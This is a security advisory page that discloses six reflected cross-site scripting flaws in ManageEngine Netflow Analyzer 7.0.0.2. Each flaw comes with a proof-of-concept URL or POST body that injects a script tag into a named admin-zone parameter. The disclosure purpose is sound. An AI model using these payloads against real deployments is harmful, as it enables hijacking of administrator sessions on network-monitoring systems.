Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 XSS

2019.02.11
Credit: Rafael Pedrero
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2019-7422 | CVE-2019-7423 | CVE-2019-7424 | CVE-2009-3903 | CVE-2019-7425 | CVE-2019-7426 | CVE-2019-7427
CWE: CWE-79

<!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7422 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/addMailSettings.jsp" file in the gF parameter. 2. Proof of Concept http://localhost:8080/netflow/jspui/addMailSettings.jsp?task=mail&firstTime=true&gF=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E Parameter gF 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7423 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/editProfile.jsp" file in the userName parameter. 2. Proof of Concept http://localhost:8080/netflow/jspui/editProfile.jsp?userName=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E Parameter userName. 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7424 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/index.jsp" file in the view GET parameter or any of these POST parameters: autorefTime, section, snapshot, viewOpt, viewAll, view, or groupSelName. The latter is related to CVE-2009-3903. 2. Proof of Concept http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=%22%3E%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&grDisp=3 Parameter view Via POST also is vulnerable with others parameters: autorefTime, section, snapshot, viewOpt, viewAll, view and groupSelName. 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7425 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in the task parameter. 2. Proof of Concept http://localhost:8080/netflow/jspui/linkdownalertConfig.jsp?task=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E&first=true Parameter task 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7426 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in the groupDesc, groupName, groupID, or task parameter. 2. Proof of Concept POST http://localhost:8080/netflow/jspui/groupConfiguration.jsp HTTP/1.1 moveLR=&moveRL=&clickSub=true&task=Add&flag=false&groupID=0&groupName=ddd&groupDesc=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E&Submit32222=Guardar Parameter groupDesc, groupName, groupID and task 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone # Date: 31-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: https://www.manageengine.com/products/netflow/?doc # Software Link: https://www.manageengine.com/products/netflow/?doc # Version: Netflow Analyzer Professional v7.0.0.2 Administration zone # Tested on: all # CVE : CVE-2019-7427 # Category: webapps 1. Description XSS exists in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 in the Administration zone "/netflow/jspui/linkdownalertConfig.jsp" file in the autorefTime or graphTypes parameter. 2. Proof of Concept POST http://localhost:8080/netflow/jspui/NetworkSnapShot.jsp HTTP/1.1 setPerio=&firstTime=false&graphTypes=line&timeFrame=Today&autorefTime=%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E Parameter autorefTime and graphTypes 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top